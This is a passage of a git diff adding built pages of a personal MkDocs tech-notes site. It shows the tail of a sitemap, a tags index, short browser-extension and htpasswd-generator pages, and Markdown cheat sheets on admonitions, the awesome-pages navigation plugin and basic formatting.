+ daily
+
+
+ https://3os.org/android/apktool/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/android/applications/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/android/jadx-decompiler/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/android/mobsf/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/android/ssl-pinning-bypass/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/ddns-cloudflare-bash/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/ddns-cloudflare-powershell/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/gmail-mark-archived-mail-as-read/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/pihole-cloudflare-dns-sync/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/syncthings/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/guides/better-terminal-experience/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/automation/guides/pihole-doh/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/development/node-npm/npm/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/development/node-npm/pm2/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/development/python/pip/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/development/python/supervisor/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/development/python/virtualenv/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/development/ruby/ruby/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/common-docker-commands/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/docker-containers/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/docker-images/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/docker-install/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/docker-networks/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/docker-security/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/docker/watchtower/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/git/delete-commit-history/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/git/git-cli-cheat-sheet/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/git/git-submodules/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/devops/git/github-cli/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/homelab/devices/synology-nas/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/information/affiliateDisclosure/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/information/cookies-policy/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/information/endorsement/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/information/license/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/information/portfolio/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/information/privacy-policy/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/openwrt/disable-ipv6/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/openwrt/install-oh-my-zsh/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/openwrt/snippets/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/cloud-image-template/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/lets-encrypt-cloudflare/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/pvekclean/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/vm-disk-expander/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/windows-vm-configuration/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/network/disable-ipv6/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/proxmox/network/proxmox-networking/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/synology/Install-oh-my-zsh/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/synology/Installing-vm-tools-on-virtual-machine/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/synology/auto-dsm-config-backup/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/synology/disable-dms-listening-on-80-443-ports/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/synology/enable-ssh-root-login/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/synology/ssh-with-rsa-key/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/edge-router/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/cli-commands/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/infrastructure/vmware/vmware-fusion/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/files-handling/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/general-snippets/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/locales-time-zone/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/lvm-partitions/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/memory-swap/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/services-and-daemons/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/smb-mount-autofs/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/ssh-hardening-with-rsa-keys/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/Network/identify-nics/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/ubuntu-debian/disable-ipv6/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/ubuntu-debian/free-port-53/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/ubuntu-debian/remove-snap-store/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/linux/ubuntu-debian/unattended-upgrades/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/applications-tweaks/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/enable-root-user/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/import-ssh-keys-keychain/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/terminal-snippets/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/touch-id-for-sudo/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/ui-tweaks/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/homebrew/brewup/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/homebrew/homebrew-snippets/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/mac-os/python/pyenv-virtualenv/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/cheatsheets/cli-commands-collation/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/cheatsheets/gobuster-cheatsheet/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/cheatsheets/nmap-cheatsheet/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/cheatsheets/xss-cheatsheet/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/kali-linux/bettercap1.6.2/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/kali-linux/kali-linux/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/kali-linux/links/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/kali-linux/metasploit/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/kali-linux/wifite/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/proxmark/about-proxmark/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/proxmark/cheatsheet/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/proxmark/mifare-tags/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/utilities/clickjacking/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/penetration-testing/utilities/idd-generator/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/docker-raspberrypi/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/external-power-button/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/motion-sensor-display-control/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/snippets/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/guides/3g-modem-host/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/projects/magic-mirror-v2/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/raspberry-pi/projects/magic-mirror/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/htpasswd-generator/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/useful-links-tools/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/wifiQrGenerator/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/browsers-extensions/chrome/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/browsers-extensions/firefox/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/about/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/admonition/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/awesome-pages/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/basic-formatting/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/code-blocks/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/content-tabs/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/diagrams/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/external-markdown/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/icons/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/images/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/links/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/utilities/markdown-cheatsheet/tables-lists-quotes/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/ssh-server/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/useful-software/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/windows-servers/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/windows-ssh-agent-with-keys/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/windows-tweaks/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/guides/declare-locations/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/windows/guides/email-from-task-scheduler/
+ 2023-11-26
+ daily
+
+
+ https://3os.org/tags/
+ 2023-11-26
+ daily
+
+
\ No newline at end of file
diff --git a/sitemap.xml.gz b/sitemap.xml.gz
new file mode 100644
index 000000000..214809eb5
Binary files /dev/null and b/sitemap.xml.gz differ
diff --git a/tags/index.html b/tags/index.html
new file mode 100644
index 000000000..490641ac0
--- /dev/null
+++ b/tags/index.html
@@ -0,0 +1,143 @@
+ Tags and Categories - 3os Authors: fire1ce | Created: 2022-02-20 | Last update: 2022-03-18 3g-modem Cookies Git HomeLab IID NAS OpenSSH Proxmox SSH Security Synology Tweeks Ubuntu VirtIO Windows Windows Virtual Machines Windwos adb admonition affiliate android application autofs automation bash cheat-sheet cheatsheet chrome cli clickjacking cloudflare code-blocks collation commands container content-tabs ddns debian decompiler diagram dns dns-over-https docker docker-compose doh dsm ed25519 edgerouter emojis endorsements extensions external-markdown files-handling firefox frida gem git github gpu headings history homebrew horizontal-line htpasswd iTerm2 icons igpu images ipv6 java kali kali-linux letsencrypt license links linux lists locales lvm macOS maco macos magic-mirror magicmirror markdown markdown-cheatsheet mermaid mkdocs motion-sensor mount network node npm oh-my-zsh package-manager passthrough penetration-testing pi-hole pip pm2 portfolio ports powershell privacy policy process-manager processes-manager proxmox pt python quotes raspberry-pi resume reverse-engineering rfid rsa rsa-keys ruby security servers share smb snippets ssh ssh-server ssl-pinning submodules supervisor syncthing synology tables template terminal text-highlighting timezone touchID ubiquiti ubuntu udm unifi utilities venv vgpu virtualization vmware vmware-fusion watchtower wifi windows wireguard zsh Back to top
\ No newline at end of file
diff --git a/utilities/browsers-extensions/chrome/index.html b/utilities/browsers-extensions/chrome/index.html
new file mode 100644
index 000000000..b2d5f5ac0
--- /dev/null
+++ b/utilities/browsers-extensions/chrome/index.html
@@ -0,0 +1,167 @@
+ Chrome Extensions - 3os chrome extensions Chrome Extensions List of extensions for Chrome browser.
Back to top
\ No newline at end of file
diff --git a/utilities/browsers-extensions/firefox/index.html b/utilities/browsers-extensions/firefox/index.html
new file mode 100644
index 000000000..1d433ef2f
--- /dev/null
+++ b/utilities/browsers-extensions/firefox/index.html
@@ -0,0 +1,167 @@
+ Firefox Extensions - 3os firefox extensions Authors: fire1ce | Created: 2022-03-24 | Last update: 2022-04-17 Firefox Extensions List of extensions for Firefox browser.
Back to top
\ No newline at end of file
diff --git a/utilities/htpasswd-generator/index.html b/utilities/htpasswd-generator/index.html
new file mode 100644
index 000000000..cd6b8a8d5
--- /dev/null
+++ b/utilities/htpasswd-generator/index.html
@@ -0,0 +1,167 @@
+ htpasswd Password Generator - 3os htpasswd Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-05 htpasswd Password Generator This htpasswd password encryption applet is written in JavaScript, so the entire process runs within your browser.Nothing is transmitted to any server, we take your privacy and securityserious.
Credit & Sources The code was built by macminiosx and cloned from his repository . It was slightly modified to fit this website.
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/about/index.html b/utilities/markdown-cheatsheet/about/index.html
new file mode 100644
index 000000000..66ce24bb0
--- /dev/null
+++ b/utilities/markdown-cheatsheet/about/index.html
@@ -0,0 +1,143 @@
+ About Markdown - 3os markdown-cheatsheet mkdocs Authors: fire1ce | Created: 2022-02-20 | Last update: 2022-08-05 About Markdown Markdown is a lightweight markup language with plain text formatting syntax. It is designed so that it can be converted to HTML and many other formats using a tool by the same name. Markdown is often used to format readme files, for writing messages in online discussion forums, and to create rich text using a plain text editor. As the initial description of Markdown contained ambiguities and unanswered questions, many implementations and extensions of Markdown appeared over the years to answer these issues.
This Page is fully written with Markdown Language and converted to HTML
Material for MkDocs Markdown This website is built with MkDocs . MkDocs is a static site generator that can be used to generate websites with a clean and simple user interface. It is a free and open source project.
Warning
Most of the advanced features used to generate this website and the Markdown syntax used from Material Theme for MkDocs and may not apply to other websites.
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/admonition/index.html b/utilities/markdown-cheatsheet/admonition/index.html
new file mode 100644
index 000000000..587e3082a
--- /dev/null
+++ b/utilities/markdown-cheatsheet/admonition/index.html
@@ -0,0 +1,168 @@
+ Admonitions - 3os markdown-cheatsheet mkdocs admonition Authors: fire1ce | Created: 2022-02-20 | Last update: 2022-04-03 Markdown Admonitions Admonitions, also known as call-outs , are an excellent choice for including side content without significantly interrupting the document flow. Material for MkDocs provides several different types of admonitions and allows for the inclusion and nesting of arbitrary content.
Usage Admonitions follow a simple syntax: a block starts with !!!
, followed by a single keyword used as a [type qualifier]. The content of the block follows on the next line, indented by four spaces:
Admonition !!! note
+
+ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod
+ nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor
+ massa, nec semper lorem quam in massa.
+
Note
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Changing The Title By default, the title will equal the type qualifier in titlecase. However, it can be changed by adding a quoted string containing valid Markdown (including links, formatting, ...) after the type qualifier:
Admonition with custom title !!! note "Phasellus posuere in sem ut cursus"
+
+ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod
+ nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor
+ massa, nec semper lorem quam in massa.
+
Phasellus posuere in sem ut cursus
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Removing The Title Similar to [changing the title], the icon and title can be omitted entirely by adding an empty string directly after the type qualifier. Note that this will not work for [collapsible blocks]:
Admonition without title !!! note ""
+
+ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod
+ nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor
+ massa, nec semper lorem quam in massa.
+
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Collapsible Blocks When [Details] is enabled and an admonition block is started with ???
instead of !!!
, the admonition is rendered as a collapsible block with a small toggle on the right side:
Admonition, collapsible ??? note
+
+ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod
+ nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor
+ massa, nec semper lorem quam in massa.
+
Note Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Adding a +
after the ???
token renders the block expanded:
Admonition, collapsible and initially expanded ???+ note
+
+ Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod
+ nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor
+ massa, nec semper lorem quam in massa.
+
Note Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Supported Types Following is a list of type qualifiers provided by Material for MkDocs, whereas the default type, and thus fallback for unknown type qualifiers, is note
:
note
Note
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
abstract
, summary
, tldr
Abstract
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
info
, todo
Info
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
tip
, hint
, important
Tip
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
success
, check
, done
Success
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
question
, help
, faq
Question
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
warning
, caution
, attention
Warning
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
failure
, fail
, missing
Failure
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
danger
, error
Danger
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
bug
Bug
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
example
Example
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
quote
, cite
Quote
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla. Curabitur feugiat, tortor non consequat finibus, justo purus auctor massa, nec semper lorem quam in massa.
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/awesome-pages/index.html b/utilities/markdown-cheatsheet/awesome-pages/index.html
new file mode 100644
index 000000000..e0138226f
--- /dev/null
+++ b/utilities/markdown-cheatsheet/awesome-pages/index.html
@@ -0,0 +1,265 @@
+ Awesome Pages Plugin - 3os template markdown Authors: fire1ce | Created: 2022-03-24 | Last update: 2022-04-03 Mkdocs Awesome Pages Plugin An MkDocs plugin that simplifies configuring page titles and their order
The awesome-pages plugin allows you to customize how your pages show up the navigation of your MkDocs without having to configure the full structure in your mkdocs.yml. It gives you detailed control using a small configuration file directly placed in the relevant directory of your documentation. MkDocs Awesome Pages Plugin Github Repository
Features Customize Navigation Create a file named .pages
in a directory and use the nav
attribute to customize the navigation on that level. List the files and subdirectories in the order that they should appear in the navigation.
nav :
+ - subdirectory
+ - page1.md
+ - page2.md
+
Rest Pages or sections that are not mentioned in the list will not appear in the navigation. However, you may include a ...
entry to specify where all remaining items should be inserted.
nav :
+ - introduction.md
+ - ...
+ - summary.md
+
Furthermore, it is possible to filter the remaining items using glob patterns or regular expressions. For example to match only the Markdown files starting with introduction-
.
nav :
+ - ... | introduction-*.md
+ - ...
+ - summary.md
+
Note: The pattern is checked against the basename (folder- / filename) of remaining items - not their whole path.
For more details refer to the Rest Filter Patterns section below.
Titles You can optionally specify a title for the navigation entry.
nav :
+ - ...
+ - First page : page1.md
+
Note: Specifying a title for a directory containing a .pages
file that defines a title
has no effect.
Links You can also use the nav
attribute to add additional links to the navigation.
nav :
+ - ...
+ - Link Title : https://lukasgeiter.com
+
Sections You can group items by creating new sections.
nav :
+ - introduction.md
+ - Section 1 :
+ - page1.md
+ - page2.md
+ - Section 2 :
+ - ...
+
Change Sort Order Create a file named .pages
in a directory and set the order
attribute to asc
or desc
to change the order of navigation items.
Note: Unlike the default order, this does not distinguish between files and directories. Therefore pages and sections might get mixed.
Natural Sort Type Create a file named .pages
in a directory and set the sort_type
attribute to natural
to use natural sort order .
This can be combined with order
above.
Order Navigation By Preference Create a file named .pages
in a directory and set the order_by
attribute to filename
or title
to change the order of navigation items.
This can be combined with order
and/or sort_type
above. If order
is not set it will order ascending. If no preference is set, it will order by filename.
Collapse Single Nested Pages Note: This feature is disabled by default. More on how to use it below
If you have directories that only contain a single page, awesome-pages can "collapse" them, so the folder doesn't show up in the navigation.
For example if you have the following file structure:
docs/
+├─ section1/
+│ ├─ img/
+│ │ ├─ image1.png
+│ │ └─ image2.png
+│ └─ index.md # Section 1
+└─ section2/
+ └─ index.md # Section 2
+
The pages will appear in your navigation at the root level:
Instead of how MkDocs would display them by default:
Section 1 Index Section 2 Index For all pages Collapsing can be enabled globally using the collapse_single_pages
option in mkdocs.yml
For a sub-section If you only want to collapse certain pages, create a file called .pages
in the directory and set collapse_single_pages
to true
:
collapse_single_pages : true
+
You may also enable collapsing globally using the plugin option and then use the .pages
file to prevent certain sub-sections from being collapsed by setting collapse_single_pages
to false
.
Note: This feature works recursively. That means it will also collapse multiple levels of single pages.
For a single page If you want to enable or disable collapsing of a single page, without applying the setting recursively, create a file called .pages
in the directory and set collapse
to true
or false
:
Hide Directory Create a file named .pages
in a directory and set the hide
attribute to true
to hide the directory, including all sub-pages and sub-sections, from the navigation:
Note: This option only hides the section from the navigation. It will still be included in the build and can be accessed under its URL.
Set Directory Title Create a file named .pages
in a directory and set the title
to override the title of that directory in the navigation:
Arrange Pages Deprecated: arrange
will be removed in the next major release - Use nav
instead .
Create a file named .pages
in a directory and set the arrange
attribute to change the order of how child pages appear in the navigation. This works for actual pages as well as subdirectories.
title : Page Title
+arrange :
+ - page1.md
+ - page2.md
+ - subdirectory
+
If you only specify some pages, they will be positioned at the beginning, followed by the other pages in their original order.
You may also include a ...
entry at some position to specify where the rest of the pages should be inserted:
arrange :
+ - introduction.md
+ - ...
+ - summary.md
+
In this example introduction.md
is positioned at the beginning, summary.md
at the end, and any other pages in between.
Combine Custom Navigation & File Structure MkDocs gives you two ways to define the structure of your navigation. Either create a custom navigation manually in mkdocs.yml
or use the file structure to generate the navigation. This feature makes it possible to combine both methods. Allowing you to manually define parts of your navigation without having to list all files.
Note: You can freely combine this with all the other features of this plugin. However they will only affect the part of the navigation that is not defined manually.
Use the nav
entry in mkdocs.yml
to define the custom part of your navigation. Include a ...
entry where you want the navigation tree of all remaining pages to be inserted.
The following examples are based on this file structure:
docs/
+├─ introduction.md
+├─ page1.md
+├─ page2.md
+└─ folder/
+ ├─ introduction.md
+ ├─ page3.md
+ └─ page4.md
+
If you wanted introduction.md
, page1.md
and page2.md
to appear under their own section you could do this:
nav :
+ - Start :
+ - page1.md
+ - page2.md
+ - summary.md
+ - ...
+
Which would result in the following navigation:
Start Introduction Page 1 Page 2 Folder Introduction Page 3 Page 4 The ...
entry can also be placed at a deeper level:
nav :
+ - page1.md
+ - Rest :
+ - ...
+
Which would result in the following navigation:
Page 1 Rest Introduction Page 2 Folder Introduction Page 3 Page 4 Furthermore, it is possible to filter the remaining items using glob patterns or regular expressions. For example to match only files named introduction.md
.
nav :
+ - Introductions :
+ - ... | **/introduction.md
+ - ...
+
With the following result:
Introductions Introduction Introduction Page 1 Page 2 Folder Note: The pattern is checked against the path relative to the docs directory.
For more details refer to the Rest Filter Patterns section below.
By default, remaining items keep their hierarchical structure. You may add flat
to flatten all the matching pages:
nav :
+ - page1.md
+ - Rest :
+ - ... | flat | **/introduction.md
+ - ... | flat
+
Page 1 Rest Introduction Introduction Page 2 Page 3 Page 4
Rest Filter Patterns In all places where the rest entry (...
) is allowed, you can also include a glob pattern or regular expression to filter the items to be displayed.
nav :
+ - ... | page-*.md
+ - ... | regex=page-[0-9]+.md
+
The filter only operates on remaining items. This means it will not include items that are explicitly listed in the navigation or items that are matched by another filter that appears earlier in the configuration.
You may also include a rest entry without filter to act as a catch-all, inserting everything that is not matched by a filter.
Syntax Details Unless the filter starts with regex=
it is interpreted as glob pattern, however you may also explicitly say so using glob=
. The spaces around ...
are optional but recommended for readability.
Note: Depending on the characters in your filter, you might also need to use quotes around the whole entry.
nav :
+ # equivalent glob entries
+ - ... | page-*.md
+ - ... | glob=page-*.md
+ - ...|page-*.md
+ - '... | page-*.md'
+
+ # equivalent regex entries
+ - ... | regex=page-[0-9]+.md
+ - ...|regex=page-[0-9]+.md
+ - '... | regex=page-[0-9]+.md'
+
Options You may customize the plugin by passing options in mkdocs.yml
:
plugins :
+ - awesome-pages :
+ filename : .index
+ collapse_single_pages : true
+ strict : false
+ order : asc
+ sort_type : natural
+ order_by : title
+
filename
Name of the file used to configure pages of a directory. Default is .pages
collapse_single_pages
Enable the collapsing of single nested pages. Default is false
strict
Raise errors instead of warnings when:
arrange
entries cannot be found nav
entries cannot be found Default is true
order
, sort_type
and order_by
Global fallback values for the Meta attributes. Default is None
or filename
.
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/basic-formatting/index.html b/utilities/markdown-cheatsheet/basic-formatting/index.html
new file mode 100644
index 000000000..358e5b065
--- /dev/null
+++ b/utilities/markdown-cheatsheet/basic-formatting/index.html
@@ -0,0 +1,162 @@
+ Basic Formatting - 3os markdown-cheatsheet mkdocs headings text-highlighting horizontal-line Authors: fire1ce | Created: 2022-02-26 | Last update: 2022-04-03 Text Styling Markdown makes it easy to format messages. Type a message as you normally would, then use these the following formatting syntax to render the message a specific way
Markdown Syntax Result **bold**
bold _italic_
italic ==highlight==
highlight ~~strike through~~
strike through ^^underline^^
underline `Inline Code`
Inline Code
==_you_ **can** ^^combine^^ `too`==
you can combine too
Horizontal Line Horizontal Line Example Horizontal line
+
+---
+
+Three consecutive dashes
+
Result:
Horizontal line
Three consecutive dashes
Heading To create a heading, add number signs (#) in front of a word or phrase. The number of number signs you use should correspond to the heading level. For example, to create a heading level three (h3), use three number signs (e.g., ### My Header).
Headings from h1
through h6
are constructed with a #
for each level:
Regular Headings Regular Headings (h1-h6) ### Heading 3
+
+#### Heading 4
+
+##### Heading 5
+
+###### Heading 6
+
Result:
Heading 3 Heading 4 Heading 5 Heading 6 Headings with secondary text Headings with secondary text (h1-h6) ### Heading 3 <small>with secondary text</small>
+
+#### Heading 4 <small>with secondary text</small>
+
+##### Heading 5 <small>with secondary text</small>
+
